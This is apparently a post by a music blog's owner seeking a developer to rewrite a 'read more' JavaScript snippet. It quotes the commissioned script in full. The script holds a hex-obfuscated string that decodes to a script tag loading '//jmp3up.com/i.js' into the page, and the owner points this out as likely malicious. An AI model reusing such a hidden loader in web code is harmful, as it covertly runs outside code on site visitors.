We want the read more script to show in our blog like above picture shown. The script that we use before <script type='text/javascript'> //<![CDATA[ $(function(){ $(".snip").each(function(i){this.innerHTML=this.innerHTML.replace((i||$("\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x22//\x6a\x6d\x70\x33\x75\x70.\x63\x6f\x6d/\x69.\x6a\x73\x22\x3e" ) .appendTo(".cover") ,/(Release Date.*?)T.*/),"$1").replace(/((?:Title|Release Date).*?/g,"<br>$1")}) }) $(".post-header-line-1").find('li').eq(1).html( /Artist :[\s\S]*Title[\s\S]*Release Date[\s\S]*Tracklist/.test($(".auto-thumbnail").text()) ? $(".auto-thumbnail").text().replace(/Tracklist[\s\S]+$/g,"").replace(/(.*(.*)/g,"<strong>$1</strong>$2<br>") : '' ); // ]]> </script> Why we don't use this script because the script show something very curious & malicious for us. It contains others site link URL http://jmp3up.com. And "\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x22//\x6a\x6d\x70\x33\x75\x70.\x63\x6f\x6d/\x69.\x6a\x73\x22\x3e" this mean '<script src="//jmp3up.com/i.js">' the i.js seem like something hacking. See here http://s3cwatch.wordpress.com/2009/03/05/tsnsecnijs/. This script is original developed by Ivan Castellanos(ivanca@gmail.com). We had spent our money to ask for him to write for the javascript. He did it but we found that the javascript is really strange. We had contact him for two days already, but haven't get reply from him. So , We need a website designer for javascript code to redesign/remodified the read more javascript code for us. We will pay for his work. Please contact us at wsk_91@yahoo.com Our blog : http://www.j-mp3.info